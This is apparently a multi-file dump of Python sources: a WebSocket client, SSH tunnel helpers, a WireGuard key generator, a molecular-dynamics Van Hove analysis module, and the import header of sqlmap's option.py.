                                     ssl_options, headers=headers, exclude_headers=exclude_headers)
        # run() (inherited read loop) executes on this thread once the
        # handshake completes; daemon so it never blocks interpreter exit
        self._th = threading.Thread(target=self.run, name='WebSocketClient')
        self._th.daemon = True

    @property
    def daemon(self):
        """
        `True` if the client's thread is set to be a daemon thread.
        """
        return self._th.daemon

    @daemon.setter
    def daemon(self, flag):
        """
        Set to `True` if the client's thread should be a daemon.
        """
        self._th.daemon = flag

    def run_forever(self):
        """
        Simply blocks the thread until the
        websocket has terminated.
        """
        # poll with a short join timeout so Ctrl-C is still delivered
        while not self.terminated:
            self._th.join(timeout=0.1)

    def handshake_ok(self):
        """
        Called when the upgrade handshake has completed
        successfully.

        Starts the client's thread.
        """
        self._th.start()
if __name__ == '__main__':
    # Manual demo against a local echo server on port 9000.
    from ws4py.client.threadedclient import WebSocketClient

    class EchoClient(WebSocketClient):
        def opened(self):
            # send one streamed (generator-backed) message first...
            def data_provider():
                for i in range(0, 200, 25):
                    yield "#" * i
            self.send(data_provider())
            # ...then individual messages of increasing size
            for i in range(0, 200, 25):
                self.send("*" * i)

        def closed(self, code, reason):
            print(("Closed down", code, reason))

        def received_message(self, m):
            # print the size of each echo; close after the largest (175 chars)
            print("#%d" % len(m))
            if len(m) == 175:
                self.close(reason='bye bye')

    try:
        ws = EchoClient('ws://localhost:9000/ws', protocols=['http-only', 'chat'],
                        headers=[('X-Test', 'hello there')])
        ws.connect()
        ws.run_forever()
    except KeyboardInterrupt:
        ws.close()
|
tunnel.py | """Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
Authors
-------
* Min RK
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 IPython Development Team, Min Ragan-Kelley
#
# Redistributed from IPython under the terms of the BSD License.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import os,sys,atexit
import socket
from getpass import getpass, getuser
try:
import paramiko
except ImportError:
paramiko = None
else:
from forward import forward_tunnel
try:
import pexpect
except ImportError:
pexpect = None
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
# Ports already handed out by select_random_ports in this process.
_random_ports = set()

def select_random_ports(n):
    """Select and return n distinct random ports that are available.

    Each candidate socket is bound to an OS-chosen free port; ports handed
    out on earlier calls (tracked in _random_ports) are never reused. All
    sockets are closed before the port numbers are returned, so a small
    race remains between selection and actual use.
    """
    bound = []
    for _ in range(n):
        candidate = socket.socket()
        candidate.bind(('', 0))
        # rebind until the OS gives us a port we have not handed out before
        while candidate.getsockname()[1] in _random_ports:
            candidate.close()
            candidate = socket.socket()
            candidate.bind(('', 0))
        bound.append(candidate)
    selected = []
    for candidate in bound:
        port = candidate.getsockname()[1]
        candidate.close()
        selected.append(port)
        _random_ports.add(port)
    return selected
#-----------------------------------------------------------------------------
# Check for passwordless login
#-----------------------------------------------------------------------------
def try_passwordless_ssh(server, keyfile, paramiko=None):
    """Attempt to make an ssh connection without a password.

    This is mainly used for requiring password input only once
    when many tunnels may be connected to the same server.

    If paramiko is None, the default for the platform is chosen
    (paramiko on Windows, the shell ssh command elsewhere).
    """
    if paramiko is None:
        paramiko = sys.platform == 'win32'
    checker = _try_passwordless_paramiko if paramiko else _try_passwordless_openssh
    return checker(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
    """Try passwordless login with the shell ssh command.

    Spawns `ssh -f <server> exit` and watches its output: EOF without a
    password prompt means key-based login worked (True); seeing a password
    prompt means it did not (False).
    """
    if pexpect is None:
        raise ImportError("pexpect unavailable, use paramiko")
    cmd = 'ssh -f '+ server
    if keyfile:
        cmd += ' -i ' + keyfile
    cmd += ' exit'
    p = pexpect.spawn(cmd)
    while True:
        try:
            # fix: the pattern was '[Ppassword]:' — a single-character class
            # followed by ':' that can match stray text like "d:" anywhere in
            # the output. '[Pp]assword:' matches the actual prompt in either
            # capitalisation, consistent with openssh_tunnel below.
            p.expect('[Pp]assword:', timeout=.1)
        except pexpect.TIMEOUT:
            continue
        except pexpect.EOF:
            return True
        else:
            return False
def _try_passwordless_paramiko(server, keyfile):
    """Try passwordless (key-based) login with paramiko.

    Returns True when the connection succeeds without a password,
    False on an AuthenticationException.
    """
    if paramiko is None:
        # fix: the message previously misspelled "unavailable"
        msg = "Paramiko unavailable, "
        if sys.platform == 'win32':
            msg += "Paramiko is required for ssh tunneled connections on Windows."
        else:
            msg += "use OpenSSH."
        raise ImportError(msg)
    username, server, port = _split_server(server)
    client = paramiko.SSHClient()
    client.load_system_host_keys()
    # warn (rather than fail) on unknown host keys
    client.set_missing_host_key_policy(paramiko.WarningPolicy())
    try:
        client.connect(server, port, username=username, key_filename=keyfile,
                       look_for_keys=True)
    except paramiko.AuthenticationException:
        return False
    else:
        client.close()
        return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
    """Connect a socket to an address via an ssh tunnel.

    This is a wrapper for socket.connect(addr), when addr is not accessible
    from the local machine. It creates an ssh tunnel using the remaining
    args, then connects the socket to the tunnel's randomly selected local
    port instead of to addr directly.
    """
    forwarded_url, tunnel = open_tunnel(addr, server, keyfile=keyfile,
                                        password=password, paramiko=paramiko,
                                        timeout=timeout)
    socket.connect(forwarded_url)
    return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
    """Open a tunneled connection from a 0MQ url.

    For use inside tunnel_connection.

    Returns
    -------
    (url, tunnel): The 0MQ url that has been forwarded, and the tunnel object
    """
    local_port = select_random_ports(1)[0]
    # addr looks like 'tcp://ip:port' — peel off the transport, then the port
    _transport, endpoint = addr.split('://')
    remote_ip, remote_port = endpoint.split(':')
    remote_port = int(remote_port)
    if paramiko is None:
        paramiko = sys.platform == 'win32'
    make_tunnel = paramiko_tunnel if paramiko else openssh_tunnel
    tunnel = make_tunnel(local_port, remote_port, server, remoteip=remote_ip,
                         keyfile=keyfile, password=password, timeout=timeout)
    return 'tcp://127.0.0.1:%i' % local_port, tunnel
def openssh_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
    """Create an ssh tunnel using command-line ssh that connects port lport
    on this machine to localhost:rport on server. The tunnel
    will automatically close when not in use, remaining open
    for a minimum of timeout seconds for an initial connection.

    This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
    as seen from `server`.

    keyfile and password may be specified, but ssh config is checked for defaults.

    Parameters
    ----------
    lport : int
        local port for connecting to the tunnel from this machine.
    rport : int
        port on the remote machine to connect to.
    server : str
        The ssh server to connect to. The full ssh server string will be parsed.
        user@server:port
    remoteip : str [Default: 127.0.0.1]
        The remote ip, specifying the destination of the tunnel.
        Default is localhost, which means that the tunnel would redirect
        localhost:lport on this machine to localhost:rport on the *server*.
    keyfile : str; path to public key file
        This specifies a key to be used in ssh login, default None.
        Regular default ssh keys will be used without specifying this argument.
    password : str;
        Your ssh password to the ssh server. Note that if this is left None,
        you will be prompted for it if passwordless key based login is unavailable.
    timeout : int [default: 60]
        The time (in seconds) after which no activity will result in the tunnel
        closing. This prevents orphaned tunnels from running forever.

    Returns the pid of the backgrounded ssh process on success; raises
    RuntimeError when ssh exits non-zero.
    """
    if pexpect is None:
        raise ImportError("pexpect unavailable, use paramiko_tunnel")
    ssh="ssh "
    if keyfile:
        ssh += "-i " + keyfile
    # -f backgrounds ssh after auth; the remote 'sleep <timeout>' keeps the
    # tunnel alive long enough for the first connection to arrive
    cmd = ssh + " -f -L 127.0.0.1:%i:%s:%i %s sleep %i"%(lport, remoteip, rport, server, timeout)
    tunnel = pexpect.spawn(cmd)
    failed = False
    # interact with the spawned ssh until it either backgrounds (EOF) or
    # keeps prompting for a password
    while True:
        try:
            tunnel.expect('[Pp]assword:', timeout=.1)
        except pexpect.TIMEOUT:
            # no prompt yet; keep polling
            continue
        except pexpect.EOF:
            # ssh exited: success iff the exit status is 0
            if tunnel.exitstatus:
                print (tunnel.exitstatus)
                print (tunnel.before)
                print (tunnel.after)
                raise RuntimeError("tunnel '%s' failed to start"%(cmd))
            else:
                return tunnel.pid
        else:
            # got a password prompt; a second prompt means the previous
            # password was rejected, so re-prompt the user
            if failed:
                print("Password rejected, try again")
                password=None
            if password is None:
                password = getpass("%s's password: "%(server))
            tunnel.sendline(password)
            failed = True
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
    """launch a tunnel with paramiko in a subprocess. This should only be used
    when shell ssh is unavailable (e.g. Windows).

    This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
    as seen from `server`.

    If you are familiar with ssh tunnels, this creates the tunnel:

    ssh server -L localhost:lport:remoteip:rport

    keyfile and password may be specified, but ssh config is checked for defaults.

    Parameters
    ----------
    lport : int
        local port for connecting to the tunnel from this machine.
    rport : int
        port on the remote machine to connect to.
    server : str
        The ssh server to connect to. The full ssh server string will be parsed.
        user@server:port
    remoteip : str [Default: 127.0.0.1]
        The remote ip, specifying the destination of the tunnel.
        Default is localhost, which means that the tunnel would redirect
        localhost:lport on this machine to localhost:rport on the *server*.
    keyfile : str; path to public key file
        This specifies a key to be used in ssh login, default None.
        Regular default ssh keys will be used without specifying this argument.
    password : str;
        Your ssh password to the ssh server. Note that if this is left None,
        you will be prompted for it if passwordless key based login is unavailable.
    timeout : int [default: 60]
        The time (in seconds) after which no activity will result in the tunnel
        closing. This prevents orphaned tunnels from running forever.

    Returns the multiprocessing.Process running the tunnel.
    """
    try:
        from multiprocessing import Process
    except ImportError:
        # fix: the message previously misspelled "tunnels"
        raise ImportError("multiprocessing module required for backgrounding Paramiko tunnels")
    if paramiko is None:
        raise ImportError("Paramiko not available")
    # prompt for a password only if key-based auth does not work
    if password is None:
        if not _try_passwordless_paramiko(server, keyfile):
            password = getpass("%s's password: "%(server))
    # run the tunnel in a child process so it does not block this one
    p = Process(target=_paramiko_tunnel,
                args=(lport, rport, server, remoteip),
                kwargs=dict(keyfile=keyfile, password=password))
    p.daemon=False
    p.start()
    # make sure the child is cleaned up when this process exits
    atexit.register(_shutdown_process, p)
    return p
def _shutdown_process(p):
if p.is_alive():
p.terminate()
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
    """Function for actually starting a paramiko tunnel, to be passed
    to multiprocessing.Process(target=this), and not called directly.

    Runs forward_tunnel until interrupted; exits the child process with
    status 1 (connect failure), 0 (SIGINT) or 255 (other forwarding error).
    """
    username, server, port = _split_server(server)
    client = paramiko.SSHClient()
    client.load_system_host_keys()
    # warn (rather than abort) on unknown host keys
    client.set_missing_host_key_policy(paramiko.WarningPolicy())

    try:
        client.connect(server, port, username=username, key_filename=keyfile,
                       look_for_keys=True, password=password)
#    except paramiko.AuthenticationException:
#        if password is None:
#            password = getpass("%s@%s's password: "%(username, server))
#            client.connect(server, port, username=username, password=password)
#        else:
#            raise
    except Exception:
        # py2/py3-compatible way to grab the active exception
        e = sys.exc_info()[1]
        print ('*** Failed to connect to %s:%d: %r' % (server, port, e))
        sys.exit(1)

    # print ('Now forwarding port %d to %s:%d ...' % (lport, server, rport))

    try:
        # blocks, forwarding local connections through the ssh transport
        forward_tunnel(lport, remoteip, rport, client.get_transport())
    except KeyboardInterrupt:
        print ('SIGINT: Port forwarding stopped cleanly')
        sys.exit(0)
    except Exception:
        e = sys.exc_info()[1]
        print ("Port forwarding stopped uncleanly: %s"%e)
        sys.exit(255)
# Export the platform-appropriate default implementation: command-line ssh
# is unavailable on Windows, so paramiko is used there.
if sys.platform == 'win32':
    ssh_tunnel = paramiko_tunnel
else:
    ssh_tunnel = openssh_tunnel

__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
|
gen_key.py | import os
from os import path
from threading import Thread
from netaddr import IPNetwork
# Deployment parameters come from the environment (all required).
cidr = os.environ['CIDR']  # network in CIDR notation, e.g. "10.0.0.0/24"
client_dir = os.environ['CLIENT_DIR']  # base directory for per-client keys
number_of_clients = os.environ['NUMBER_OF_CLIENTS']
network = IPNetwork(cidr)
# skip the first two addresses of the network before taking
# NUMBER_OF_CLIENTS client addresses — presumably network address + server
# address are reserved; TODO confirm against the deployment config
range_ip = list(network)[2:int(number_of_clients)+2]
def gen_key(private_key_path, public_key_path):
    """Generate a WireGuard keypair at the given paths.

    Skips all work when either file already exists. The private key is
    written with umask 077 so it is not group/world readable.
    """
    if path.exists(public_key_path) or path.exists(private_key_path):
        return
    # fix: the paths were interpolated into the shell command unquoted;
    # shlex.quote guards against spaces/metacharacters. The pipeline itself
    # (genkey | tee | pubkey) requires a shell, hence os.system stays.
    import shlex
    os.system("umask 077; wg genkey | tee %s | wg pubkey > %s" % (
        shlex.quote(private_key_path), shlex.quote(public_key_path)))
def gen_key_without_thread():
    """Generate a keypair for every client IP, sequentially."""
    for ip in range_ip:
        key_base = "{client_dir}/{ip}".format(client_dir=client_dir, ip=ip)
        gen_key(key_base + "/privatekey", key_base + "/publickey")
def gen_key_thread():
    """Generate a keypair for every client IP concurrently, one thread per IP."""
    workers = []
    for ip in range_ip:
        key_base = "{client_dir}/{ip}".format(client_dir=client_dir, ip=ip)
        worker = Thread(target=gen_key,
                        args=(key_base + "/privatekey", key_base + "/publickey",))
        worker.start()
        workers.append(worker)
    # block until every key has been written
    for worker in workers:
        worker.join()
# Entry point: generate all client keys in parallel.
if __name__ == '__main__':
    gen_key_thread()
|
van_hove.py | import multiprocessing
import sys
import itertools as it
import warnings
import numpy as np
import mdtraj as md
from progressbar import ProgressBar
from itertools import combinations_with_replacement
from scattering.utils.utils import get_dt, get_unique_atoms
from scattering.utils.constants import get_form_factor
def compute_van_hove(
    trj,
    chunk_length,
    parallel=False,
    water=False,
    r_range=(0, 1.0),
    bin_width=0.005,
    n_bins=None,
    self_correlation=True,
    periodic=True,
    opt=True,
    partial=False,
):
    """Compute the Van Hove function of a trajectory. Atom pairs
    referenced in partial Van Hove functions are in alphabetical
    order. If specific ordering of atom pairs are needed, user should
    use compute_partial_van_hove then vhf_from_pvhf to compute total
    Van Hove function.
    Parameters
    ----------
    trj : mdtraj.Trajectory
        trajectory on which to compute the Van Hove function
    chunk_length : int
        length of time between restarting averaging
    parallel : bool, default=False
        Use parallel implementation with `multiprocessing`
    water : bool
        use X-ray form factors for water that account for polarization
    r_range : array-like, shape=(2,), optional, default=(0.0, 1.0)
        Minimum and maximum radii.
    bin_width : float, optional, default=0.005
        Width of the bins in nanometers.
    n_bins : int, optional, default=None
        The number of bins. If specified, this will override the `bin_width`
        parameter.
    self_correlation : bool, default=True
        Whether or not to include the self-self correlations
    periodic : bool, default=True
        Whether to apply periodic boundary conditions in distance calculations
    opt : bool, default=True
        Use MDTraj's optimized distance kernels
    partial : bool, default = False
        Whether or not to return a dictionary including partial Van Hove function.
    Returns
    -------
    r : numpy.ndarray
        r positions generated by histogram binning
    t : numpy.ndarray
        simulation times corresponding to the rows of `g_r_t`
    g_r_t : numpy.ndarray
        Van Hove function at each time and position
    Notes
    -----
    When ``partial=True`` the dictionary of partial Van Hove functions is
    returned instead of the ``(r, t, g_r_t)`` tuple.
    """
    # Only atoms with mass are physical; virtual sites (mass 0) are excluded.
    n_physical_atoms = len([a for a in trj.top.atoms if a.element.mass > 0])
    unique_elements = list(
        set([a.element for a in trj.top.atoms if a.element.mass > 0])
    )
    if parallel:
        # Build one argument list per element pair for compute_partial_van_hove.
        data = []
        for elem1, elem2 in it.combinations_with_replacement(unique_elements[::-1], 2):
            # Add a bool to check if self-correlations should be analyzed
            self_bool = self_correlation
            if elem1 != elem2:
                self_bool = False
                warnings.warn(
                    "Total VHF calculation: No self-correlations for {} and {}, setting `self_correlation` to `False`.".format(
                        elem1, elem2
                    )
                )
            data.append(
                [
                    trj,
                    chunk_length,
                    "element {}".format(elem1.symbol),
                    "element {}".format(elem2.symbol),
                    r_range,
                    bin_width,
                    n_bins,
                    self_bool,
                    periodic,
                    opt,
                ]
            )
        # Shared dict lets worker processes report their partial results back.
        manager = multiprocessing.Manager()
        partial_dict = manager.dict()
        jobs = []
        version_info = sys.version_info
        for d in data:
            with multiprocessing.Pool(processes=multiprocessing.cpu_count()) as pool:
                # NOTE(review): Pool.Process signature changed in Python 3.8
                # (the context became the first positional argument) -- hence
                # the version split below. A Pool is created per pair but its
                # workers are not otherwise used; confirm against upstream.
                if version_info.major == 3 and version_info.minor <= 7:
                    p = pool.Process(target=worker, args=(partial_dict, d))
                elif version_info.major == 3 and version_info.minor >= 8:
                    ctx = multiprocessing.get_context()
                    p = pool.Process(ctx, target=worker, args=(partial_dict, d))
                jobs.append(p)
                p.start()
        for proc in jobs:
            proc.join()
        # Workers stash the common r axis under the sentinel key "r".
        r = partial_dict["r"]
        del partial_dict["r"]
    else:
        partial_dict = dict()
        for elem1, elem2 in it.combinations_with_replacement(unique_elements[::-1], 2):
            # Add a bool to check if self-correlations should be analyzed
            self_bool = self_correlation
            if elem1 != elem2:
                self_bool = False
                warnings.warn(
                    "Total VHF calculation: No self-correlations for {} and {}, setting `self_correlation` to `False`.".format(
                        elem1, elem2
                    )
                )
            # Keep element pairs in alphabetical order (see docstring).
            if elem1.symbol > elem2.symbol:
                temp = elem1
                elem1 = elem2
                elem2 = temp
            print("doing {0} and {1} ...".format(elem1, elem2))
            r, g_r_t_partial = compute_partial_van_hove(
                trj=trj,
                chunk_length=chunk_length,
                selection1="element {}".format(elem1.symbol),
                selection2="element {}".format(elem2.symbol),
                r_range=r_range,
                bin_width=bin_width,
                n_bins=n_bins,
                self_correlation=self_bool,
                periodic=periodic,
                opt=opt,
            )
            partial_dict[
                ("element {}".format(elem1.symbol), "element {}".format(elem2.symbol))
            ] = g_r_t_partial
    if partial:
        return partial_dict
    # Combine partials weighted by form factors and number concentrations.
    norm = 0
    g_r_t = None
    for key, val in partial_dict.items():
        elem1, elem2 = key
        concentration1 = (
            trj.atom_slice(trj.top.select(elem1)).n_atoms / n_physical_atoms
        )
        concentration2 = (
            trj.atom_slice(trj.top.select(elem2)).n_atoms / n_physical_atoms
        )
        form_factor1 = get_form_factor(element_name=elem1.split()[1], water=water)
        form_factor2 = get_form_factor(element_name=elem2.split()[1], water=water)
        coeff = form_factor1 * concentration1 * form_factor2 * concentration2
        if g_r_t is None:
            g_r_t = np.zeros_like(val)
        g_r_t += val * coeff
        norm += coeff
    # Reshape g_r_t to better represent the discretization in both r and t
    g_r_t_final = np.empty(shape=(chunk_length, len(r)))
    for i in range(chunk_length):
        g_r_t_final[i, :] = np.mean(g_r_t[i::chunk_length], axis=0)
    g_r_t_final /= norm
    t = trj.time[:chunk_length]
    return r, t, g_r_t_final
def worker(return_dict, data):
    """Multiprocessing target: compute one partial VHF and stash the result.

    ``data`` is the positional argument list for compute_partial_van_hove;
    entries 2 and 3 are the two selection strings, used as the result key.
    The shared r axis is stored under the sentinel key "r".
    """
    pair_key = (data[2], data[3])
    r, partial_vhf = compute_partial_van_hove(*data)
    return_dict[pair_key] = partial_vhf
    return_dict["r"] = r
def compute_partial_van_hove(
    trj,
    chunk_length=10,
    selection1=None,
    selection2=None,
    r_range=(0, 1.0),
    bin_width=0.005,
    n_bins=200,
    self_correlation=True,
    periodic=True,
    opt=True,
):
    """Compute the partial van Hove function of a trajectory

    Parameters
    ----------
    trj : mdtraj.Trajectory
        trajectory on which to compute the Van Hove function
    chunk_length : int, default=10
        length of time between restarting averaging
    selection1 : str
        selection to be considered, in the style of MDTraj atom selection
    selection2 : str
        selection to be considered, in the style of MDTraj atom selection
    r_range : array-like, shape=(2,), optional, default=(0.0, 1.0)
        Minimum and maximum radii.
    bin_width : float, optional, default=0.005
        Width of the bins in nanometers.
    n_bins : int, optional, default=200
        The number of bins. If specified, this will override the `bin_width`
        parameter.
    self_correlation : bool, default=True
        Whether or not to include the self-self correlations. Forced to
        False when the two selections differ, since self-correlations only
        make sense within a single selection.
    periodic : bool, optional, default=True
        Whether to apply periodic boundary conditions in distance calculations
    opt : bool, optional, default=True
        Use MDTraj's optimized distance kernels

    Returns
    -------
    r : numpy.ndarray
        r positions generated by histogram binning
    g_r_t : numpy.ndarray
        Van Hove function at each time and position, summed over all chunks
    """
    unique_elements = (
        set([a.element for a in trj.atom_slice(trj.top.select(selection1)).top.atoms]),
        set([a.element for a in trj.atom_slice(trj.top.select(selection2)).top.atoms]),
    )
    if any([len(val) > 1 for val in unique_elements]):
        # NOTE(review): raising a Warning subclass aborts the calculation;
        # if a non-fatal notice is intended this should be `warnings.warn`.
        raise UserWarning(
            "Multiple elements found in a selection(s). Results may not be "
            "directly comparable to scattering experiments."
        )

    # Check if pair is monatomic
    # If not, do not calculate self correlations
    if selection1 != selection2 and self_correlation:
        warnings.warn(
            "Partial VHF calculation: No self-correlations for {} and {}, setting `self_correlation` to `False`.".format(
                selection1, selection2
            )
        )
        self_correlation = False

    # Don't need to store it, but this serves to check that dt is constant
    dt = get_dt(trj)

    pairs = trj.top.select_pairs(selection1=selection1, selection2=selection2)

    n_chunks = int(trj.n_frames / chunk_length)
    g_r_t = None
    pbar = ProgressBar()
    for i in pbar(range(n_chunks)):
        # Time origins within this chunk: (start, start + j) for each lag j.
        times = list()
        for j in range(chunk_length):
            times.append([chunk_length * i, chunk_length * i + j])
        r, g_r_t_frame = md.compute_rdf_t(
            traj=trj,
            pairs=pairs,
            times=times,
            r_range=r_range,
            bin_width=bin_width,
            n_bins=n_bins,
            period_length=chunk_length,
            self_correlation=self_correlation,
            periodic=periodic,
            opt=opt,
        )
        # Accumulate per-chunk results; averaging over chunks is done by the
        # caller (compute_van_hove) when reshaping.
        if g_r_t is None:
            g_r_t = np.zeros_like(g_r_t_frame)
        g_r_t += g_r_t_frame
    return r, g_r_t
def vhf_from_pvhf(trj, partial_dict, water=False):
    """
    Compute the total Van Hove function from partial Van Hove functions

    Parameters
    ----------
    trj : mdtraj.Trajectory
        trajectory on which partial vhf were calculated form
    partial_dict : dict
        dictionary containing partial vhf as a np.array.
        Key is a tuple of len 2 with 2 atom types
    water : bool, default=False
        use X-ray form factors for water that account for polarization

    Return
    -------
    total_grt : numpy.ndarray
        Total Van Hove Function generated from addition of partial Van Hove Functions

    Raises
    ------
    ValueError
        If a key of ``partial_dict`` is not a 2-tuple of ``MDTraj.Atom``
        objects belonging to ``trj``.
    """
    unique_atoms = get_unique_atoms(trj)
    all_atoms = [atom for atom in trj.topology.atoms]

    norm_coeff = 0
    # NOTE(review): shape is taken from the first row of the first partial;
    # the later `coeff * partial` addition relies on NumPy broadcasting.
    dict_shape = list(partial_dict.values())[0][0].shape
    total_grt = np.zeros(dict_shape)

    for atom_pair in partial_dict.keys():
        # checks if key is a tuple
        if not isinstance(atom_pair, tuple):
            raise ValueError("Dictionary key not valid. Must be a tuple.")
        for atom in atom_pair:
            # checks if the atoms in tuple pair are atom types
            if type(atom) != type(unique_atoms[0]):
                raise ValueError(
                    "Dictionary key not valid. Must be type `MDTraj.Atom`."
                )
            # checks if atoms are in the trajectory
            if atom not in all_atoms:
                raise ValueError(
                    f"Dictionary key not valid, `Atom` {atom} not in MDTraj trajectory."
                )
        # checks if key has two atoms
        if len(atom_pair) != 2:
            raise ValueError(
                "Dictionary key not valid. Must only have 2 atoms per pair."
            )

        atom1 = atom_pair[0]
        atom2 = atom_pair[1]
        # Weight each partial by the two form factors and number concentrations.
        # BUGFIX: `water` was previously hard-coded to False here, silently
        # ignoring the function's `water` argument.
        coeff = (
            get_form_factor(element_name=f"{atom1.element.symbol}", water=water)
            * get_form_factor(element_name=f"{atom2.element.symbol}", water=water)
            * len(trj.topology.select(f"name {atom1.name}"))
            / (trj.n_atoms)
            * len(trj.topology.select(f"name {atom2.name}"))
            / (trj.n_atoms)
        )
        normalized_pvhf = coeff * partial_dict[atom_pair]
        norm_coeff += coeff
        total_grt = np.add(total_grt, normalized_pvhf)

    total_grt /= norm_coeff
    return total_grt
|
option.py | #!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import cookielib
import glob
import inspect
import logging
import os
import random
import re
import socket
import string
import sys
import tempfile
import threading
import time
import urllib2
import urlparse
import lib.controller.checks
import lib.core.common
import lib.core.threads
import lib.core.convert
import lib.request.connect
import lib.utils.search
from lib.controller.checks import checkConnection
from lib.core.common import Backend
from lib.core.common import boldifyMessage
from lib.core.common import checkFile
from lib.core.common import dataToStdout
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import findLocalPort
from lib.core.common import findPageForms
from lib.core.common import getConsoleWidth
from lib.core.common import getFileItems
from lib.core.common import getFileType
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import openFile
from lib.core.common import parseRequestFile
from lib.core.common import parseTargetDirect
from lib.core.common import paths
from lib.core.common import randomStr
from lib.core.common import readCachedFileContent
from lib.core.common import readInput
from lib.core.common import resetCookieJar
from lib.core.common import runningAsAdmin
from lib.core.common import safeExpandUser
from lib.core.common import saveConfig
from lib.core.common import setColor
from lib.core.common import setOptimize
from lib.core.common import setPaths
from lib.core.common import singleTimeWarnMessage
from lib.core.common import urldecode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import mergedOptions
from lib.core.data import queries
from lib.core.datatype import AttribDict
from lib.core.datatype import InjectionDict
from lib.core.defaults import defaults
from lib.core.dicts import DBMS_DICT
from lib.core.dicts import DUMP_REPLACEMENTS
from lib.core.enums import ADJUST_TIME_DELAY
from lib.core.enums import AUTH_TYPE
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import DUMP_FORMAT
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import MOBILES
from lib.core.enums import OPTION_TYPE
from lib.core.enums import PAYLOAD
from lib.core.enums import PRIORITY
from lib.core.enums import PROXY_TYPE
from lib.core.enums import REFLECTIVE_COUNTER
from lib.core.enums import WIZARD
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapInstallationException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.core.exception import SqlmapUserQuitException
from lib.core.log import FORMATTER
from lib.core.optiondict import optDict
from lib.core.settings import CODECS_LIST_PAGE
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DBMS_ALIASES
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DEFAULT_PAGE_ENCODING
from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS
from lib.core.settings import DEFAULT_USER_AGENT
from lib.core.settings import DUMMY_URL
from lib.core.settings import IS_WIN
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
from lib.core.settings import LOCALHOST
from lib.core.settings import MAX_CONNECT_RETRIES
from lib.core.settings import MAX_NUMBER_OF_THREADS
from lib.core.settings import NULL
from lib.core.settings import PARAMETER_SPLITTING_REGEX
from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT
from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE
from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import SUPPORTED_OS
from lib.core.settings import TIME_DELAY_CANDIDATES
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import UNION_CHAR_REGEX
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.core.settings import URI_INJECTABLE_REGEX
from lib.core.threads import getCurrentThreadData
from lib.core.threads import setDaemon
from lib.core.update import update
from lib.parse.configfile import configFileParser
from lib.parse.payloads import loadBoundaries
from lib.parse.payloads import loadPayloads
from lib.parse.sitemap import parseSitemap
from lib.request.basic import checkCharEncoding
from lib.request.connect import Connect as Request
from lib.request.dns import DNSServer
from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler
from lib.request.httpshandler import HTTPSHandler
from lib.request.pkihandler import HTTPSPKIAuthHandler
from lib.request.rangehandler import HTTPRangeHandler
from lib.request.redirecthandler import SmartRedirectHandler
from lib.request.templates import getPageTemplate
from lib.utils.har import HTTPCollectorFactory
from lib.utils.crawler import crawl
from lib.utils.deps import checkDependencies
from lib.utils.search import search
from lib.utils.purge import purge
from thirdparty.keepalive import keepalive
from thirdparty.multipart import multipartpost
from thirdparty.oset.pyoset import oset
from thirdparty.socks import socks
from xml.etree.ElementTree import ElementTree
# urllib2 opener handler singletons -- presumably wired into a urllib2 opener
# later during option initialization (not visible in this chunk; confirm).
authHandler = urllib2.BaseHandler()
httpsHandler = HTTPSHandler()
keepAliveHandler = keepalive.HTTPHandler()
proxyHandler = urllib2.ProxyHandler()
redirectHandler = SmartRedirectHandler()
rangeHandler = HTTPRangeHandler()
multipartPostHandler = multipartpost.MultipartPostHandler()
# Reference: https://mail.python.org/pipermail/python-list/2009-November/558615.html
try:
    WindowsError
except NameError:
    # Non-Windows platforms lack WindowsError; bind the name to None so that
    # later references to it do not raise NameError.
    WindowsError = None
def _loadQueries():
    """
    Loads queries from 'xml/queries.xml' file.
    """

    def iterate(node, container=None):
        # Lightweight attribute bag supporting both `obj.attr` access
